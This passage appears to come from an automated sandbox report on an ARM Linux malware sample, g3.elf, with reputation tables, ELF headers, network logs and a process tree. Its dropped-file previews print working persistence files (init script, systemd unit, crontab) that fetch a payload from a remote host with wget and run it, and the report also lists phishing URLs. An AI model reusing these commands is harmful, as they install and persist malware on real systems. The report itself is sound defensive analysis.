            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g5.elfGet hashmaliciousUnknownBrowse
              g4.elfGet hashmaliciousUnknownBrowse
                g6.elfGet hashmaliciousUnknownBrowse
                  g3.elfGet hashmaliciousUnknownBrowse
                    m1.elfGet hashmaliciousUnknownBrowse
                      m5.elfGet hashmaliciousUnknownBrowse
                        m2.elfGet hashmaliciousUnknownBrowse
                          1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                          • 1.1.1.1:8080/
                          6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                          • 1.1.1.1/ctrl/playback.php
                          PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                          • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                          AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                          • 1.1.1.1/
                          INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                          • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                          Go.exeGet hashmaliciousUnknownBrowse
                          • 1.1.1.1/
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSg5.elfGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          https://app-nadexlxogi.webflow.io/Get hashmaliciousUnknownBrowse
                          • 172.64.151.8
                          https://postaboutx.com/Get hashmaliciousUnknownBrowse
                          • 172.67.134.64
                          https://informed.deliveryerz.top/us/Get hashmaliciousUnknownBrowse
                          • 104.16.40.28
                          https://informed.deliveryelc.top/us/Get hashmaliciousHTMLPhisherBrowse
                          • 104.21.38.157
                          https://informed.deliveryerw.top/us/Get hashmaliciousUnknownBrowse
                          • 104.16.41.28
                          https://informed.deliveryekg.top/us/Get hashmaliciousHTMLPhisherBrowse
                          • 104.21.41.205
                          https://informed.deliveryewo.top/us/Get hashmaliciousUnknownBrowse
                          • 104.21.32.1
                          https://informed.deliveryele.top/us/Get hashmaliciousHTMLPhisherBrowse
                          • 104.21.20.172
                          ASGHOSTNETDEg5.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          g4.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          g6.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          g3.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          ppc.elfGet hashmaliciousMiraiBrowse
                          • 5.175.194.122
                          x86.elfGet hashmaliciousMiraiBrowse
                          • 5.175.146.210
                          m1.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          m5.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          m2.elfGet hashmaliciousUnknownBrowse
                          • 77.90.22.16
                          Vhl3X1aYeU.exeGet hashmaliciousNjratBrowse
                          • 77.90.22.45
                          No context
                          No context
                          Process:/tmp/g3.elf
                          File Type:Bourne-Again shell script, ASCII text executable
                          Category:dropped
                          Size (bytes):625
                          Entropy (8bit):4.747808454282717
                          Encrypted:false
                          SSDEEP:12:i5BpMp5kTMp5Gu+a6pjqQ3S259srxylKNVUdURucTyl:ifpMr8MrPd6Nq+SAsrxy8bp4
                          MD5:AB0F83BD06D1050B6E7C1FBE7E3D2855
                          SHA1:43B69DF5B4685C994115402FB23304B9D226AD2A
                          SHA-256:5E5FDA7DDFFEF097E30DC807BDF3AC6C13C863485FCBBECEE63DF4FA819A4083
                          SHA-512:D2104DF98FDFF8C243C9D88F2556A9C7FA7E9D5A34BA47C543100DFBCC58B6466325E5741EF0B534B684E43937EB1E7E5CCD764F10A5E76F71881D79EBAE5B1F
                          Malicious:true
                          Reputation:low
                          Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A "arm"..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                          Process:/tmp/g3.elf
                          File Type:troff or preprocessor input, ASCII text
                          Category:dropped
                          Size (bytes):321
                          Entropy (8bit):5.265528858624767
                          Encrypted:false
                          SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOADDjF5CY1E0aKDmtXIElsCBLQmWA4Rv:zb9RZADJiIE+m6jqQ3SLHWrv
                          MD5:97283FAC51CAEEFDC440F9A0199A2D1B
                          SHA1:B0F599F568BF1DB2A6D487FC7232CD69818BBB13
                          SHA-256:1A2ADDB7882E16FBCF3F863F130B6AE2D82BCAFFA458CC40F4FC7BD2576FFB34
                          SHA-512:8B2CF4BDD03AD6BA7AE272B8B6E654DF0C604880271BB2169320F204524B4644135E7FA5647875B7ECAF596B97CAAD7C68EF43D4C8809BCDD1FC86249D59AF47
                          Malicious:false
                          Reputation:low
                          Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A "arm"..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):76
                          Entropy (8bit):3.7627880354948586
                          Encrypted:false
                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                          Process:/tmp/g3.elf
                          File Type:troff or preprocessor input, ASCII text
                          Category:dropped
                          Size (bytes):142
                          Entropy (8bit):4.813077059581295
                          Encrypted:false
                          SSDEEP:3:SH3YFKKDDjeMPHRCQqwui1SGuV0uVKDmFXXIUU0XzemmXFw2sePn:SH3oDDjF5CY1E0aKDmtXIEyW5Cn
                          MD5:79C5C0F12ABE1EDE65A42A24BBDB97D0
                          SHA1:7208BC029B831D704E8C84517540642F79E47937
                          SHA-256:279BF9EC0A11B35AE6245D29B68082FA01B79244527777325E7C46DF0952C989
                          SHA-512:78EBB08D9EBAEA977AD13F5D6CA2C89670A809229D0D0BB5E0E4C1AD6F7F6AB26F1CEA41FEE4FEB17A50E4B76D1F9D2F291CF7F1DCC14A3FA2066A272ACC8EE1
                          Malicious:true
                          Reputation:low
                          Preview:@rebootrm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A "arm"..p2 > /dev/null 2>&1;".
                          Process:/tmp/g3.elf
                          File Type:zlib compressed data
                          Category:dropped
                          Size (bytes):259
                          Entropy (8bit):3.4305646336293654
                          Encrypted:false
                          SSDEEP:6:QVDFHa7Y/VUS/FYDFH//VjmsVot/VOArB/VF:QVmS/FQI/
                          MD5:BA9320AA41B50FAEFB745084E08E2215
                          SHA1:002B81A5AF435BE4CA438CDE1C6446D619B25E2E
                          SHA-256:62C940BA1824CC359C9A52BBF37D98F494A04BEEF9D5EC8831A5BC63B3F353E5
                          SHA-512:F4444DCCF85BC3EA58A2BED5BA9AA37ED13630CF22A2A477F557106621BAF44C3546431DE4E38A4324168309F72DE266EE2ED54C7938578B6472053FED24A6B7
                          Malicious:false
                          Reputation:low
                          Preview:8000-1c000 r-xp 00000000 fd:00 531606 /tmp/g3.elf.23000-24000 rw-p 00013000 fd:00 531606 /tmp/g3.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                          Process:/usr/bin/crontab
                          File Type:troff or preprocessor input, ASCII text
                          Category:dropped
                          Size (bytes):332
                          Entropy (8bit):5.247212196775846
                          Encrypted:false
                          SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3pXWziGMQ5UYLtCFt3HYoDDjF5CY1E0aKDmtG:8Qj7QEuLut83pXWzUeHLUHYCjqQ3Vz
                          MD5:E34AF52946B8A977F2382DA8AE24A145
                          SHA1:86C2CA2D79EBA362D206BEFFDBD8265570F8608C
                          SHA-256:64C60D70D8CFA1ED8AE31096FB24D5DB4C6DED3E43A4DAF08F5DFF6ECA600AD9
                          SHA-512:FC5954171F4E5B0853FDDD91BAFD81D07A01EED609A12BEBE1B8513A09A955870C361C4FC283BDB324D8B7EA494086E142BE804B9B973FB7A751971989AE478C
                          Malicious:true
                          Reputation:low
                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sun Jan 12 23:58:02 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A "arm"..p2 > /dev/null 2>&1;".
                          File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                          Entropy (8bit):6.124445516106184
                          TrID:
                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                          File name:g3.elf
                          File size:79'736 bytes
                          MD5:336affcc13d41caea92f7c85e5179859
                          SHA1:32447c6af6b556692e07bf9beffe8735ce65bbc4
                          SHA256:6a838a52943218de23020485f7401948a0c403a266d6b2a2ff1828b938544966
                          SHA512:06fc831d557b90cb77271b3ecaa3fdb2d5020a7f57f6ec6eb9b0ec19c4ad0753a94398932be62eb8e66e4d9ac0806dbd0d911e75d4246d4d272c2f0cc1e95cdb
                          SSDEEP:1536:l1DOEkRBHQO/eaKmqxtK0J9+WXZG2DynFXvyYaD4dsnpgIZgTeg:qEcBHQeekq3YWJLwFXvyYaD4SuJT
                          TLSH:DF73085AFC829742C5C145FB771E029C37266BA8E2EB3303AD241F21779AA1F0F67546
                          File Content Preview:.ELF...a..........(.........4....5......4. ...(......................0...0...............0...0...0......L...........Q.td..................................-...L."....E..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                          ELF header

                          Class:ELF32
                          Data:2's complement, little endian
                          Version:1 (current)
                          Machine:ARM
                          Version Number:0x1
                          Type:EXEC (Executable file)
                          OS/ABI:ARM - ABI
                          ABI Version:0
                          Entry Point Address:0x8190
                          Flags:0x202
                          ELF Header Size:52
                          Program Header Offset:52
                          Program Header Size:32
                          Number of Program Headers:3
                          Section Header Offset:79296
                          Section Header Size:40
                          Number of Section Headers:11
                          Header String Table Index:10
                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                          NULL0x00x00x00x00x0000
                          .initPROGBITS0x80940x940x180x00x6AX004
                          .textPROGBITS0x80b00xb00x116b80x00x6AX0016
                          .finiPROGBITS0x197680x117680x140x00x6AX004
                          .rodataPROGBITS0x1977c0x1177c0x19480x00x2A004
                          .eh_framePROGBITS0x230c40x130c40x40x00x3WA004
                          .ctorsPROGBITS0x230c80x130c80x80x00x3WA004
                          .dtorsPROGBITS0x230d00x130d00x80x00x3WA004
                          .dataPROGBITS0x230dc0x130dc0x49c0x00x3WA004
                          .bssNOBITS0x235780x135780x29980x00x3WA004
                          .shstrtabSTRTAB0x00x135780x480x00x0001
                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                          LOAD0x00x80000x80000x130c40x130c46.11670x5R E0x8000.init .text .fini .rodata
                          LOAD0x130c40x230c40x230c40x4b40x2e4c6.07180x6RW 0x8000.eh_frame .ctors .dtors .data .bss
                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 13, 2025 06:58:02.889095068 CET4440153192.168.2.141.1.1.1
                          Jan 13, 2025 06:58:02.894237995 CET53444011.1.1.1192.168.2.14
                          Jan 13, 2025 06:58:02.894393921 CET4440153192.168.2.141.1.1.1
                          Jan 13, 2025 06:58:02.894393921 CET4440153192.168.2.141.1.1.1
                          Jan 13, 2025 06:58:02.899434090 CET53444011.1.1.1192.168.2.14
                          Jan 13, 2025 06:58:02.899502039 CET4440153192.168.2.141.1.1.1
                          Jan 13, 2025 06:58:03.669672012 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:58:03.674736023 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:58:03.674830914 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:58:03.688616991 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:58:03.693423033 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:58:35.193645954 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:58:35.198843956 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:05.912317038 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:05.917526007 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:14.761482000 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:14.767014027 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:14.942447901 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:14.942789078 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:39.358650923 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:39.359025955 CET531805625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:39.363981962 CET56255318077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:40.363569975 CET531825625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:40.368855000 CET56255318277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:40.368936062 CET531825625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:40.368971109 CET531825625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:40.373756886 CET56255318277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:41.983452082 CET56255318277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:41.983721972 CET531825625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:41.988632917 CET56255318277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:42.987499952 CET531845625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:42.992712975 CET56255318477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:42.992805004 CET531845625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:42.992839098 CET531845625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:42.997687101 CET56255318477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:44.611171007 CET56255318477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:44.611334085 CET531845625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:44.616326094 CET56255318477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:45.614759922 CET531865625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:45.767349958 CET56255318677.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:45.767457008 CET531865625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:45.767503977 CET531865625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:45.772368908 CET56255318677.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:47.408526897 CET56255318677.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:47.408731937 CET531865625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:47.413620949 CET56255318677.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:48.412820101 CET531885625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:48.417855024 CET56255318877.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:48.417973995 CET531885625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:48.418055058 CET531885625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:48.422843933 CET56255318877.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:50.052885056 CET56255318877.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:50.052997112 CET531885625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:50.057885885 CET56255318877.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:51.057116985 CET531905625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:51.062264919 CET56255319077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:51.062376976 CET531905625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:51.062458038 CET531905625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:51.067289114 CET56255319077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:52.689739943 CET56255319077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:52.690083981 CET531905625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:52.695117950 CET56255319077.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:53.693962097 CET531925625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:53.699062109 CET56255319277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:53.699156046 CET531925625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:53.699156046 CET531925625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:53.704063892 CET56255319277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:55.314814091 CET56255319277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:55.315171003 CET531925625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:55.320060968 CET56255319277.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:56.318902969 CET531945625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:56.324028969 CET56255319477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:56.324136019 CET531945625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:56.324179888 CET531945625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:56.329093933 CET56255319477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:57.939665079 CET56255319477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:57.939913988 CET531945625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:57.944886923 CET56255319477.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:58.943811893 CET531965625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:58.948853016 CET56255319677.90.22.16192.168.2.14
                          Jan 13, 2025 06:59:58.948965073 CET531965625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:58.949024916 CET531965625192.168.2.1477.90.22.16
                          Jan 13, 2025 06:59:58.953891993 CET56255319677.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:00.579549074 CET56255319677.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:00.579778910 CET531965625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:00.584842920 CET56255319677.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:01.583446980 CET531985625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:01.588545084 CET56255319877.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:01.588669062 CET531985625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:01.588715076 CET531985625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:01.593570948 CET56255319877.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:03.219458103 CET56255319877.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:03.219778061 CET531985625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:03.224827051 CET56255319877.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:04.223752975 CET532005625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:04.229379892 CET56255320077.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:04.229460001 CET532005625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:04.229517937 CET532005625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:04.235189915 CET56255320077.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:05.865447044 CET56255320077.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:05.865618944 CET532005625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:05.873847961 CET56255320077.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:06.868650913 CET532025625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:06.873841047 CET56255320277.90.22.16192.168.2.14
                          Jan 13, 2025 07:00:06.873919010 CET532025625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:06.873959064 CET532025625192.168.2.1477.90.22.16
                          Jan 13, 2025 07:00:06.878851891 CET56255320277.90.22.16192.168.2.14

                          System Behavior

                          Start time (UTC):05:57:56
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:/tmp/g3.elf
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:01
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:01
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:01
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:01
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/systemctl
                          Arguments:systemctl daemon-reload
                          File size:996584 bytes
                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/systemctl
                          Arguments:systemctl start hello.service
                          File size:996584 bytes
                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/crontab
                          Arguments:crontab /tmp/crontab.tmp
                          File size:43720 bytes
                          MD5 hash:66e521d421ac9b407699061bf21806f5

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/tmp/g3.elf
                          Arguments:-
                          File size:4956856 bytes
                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
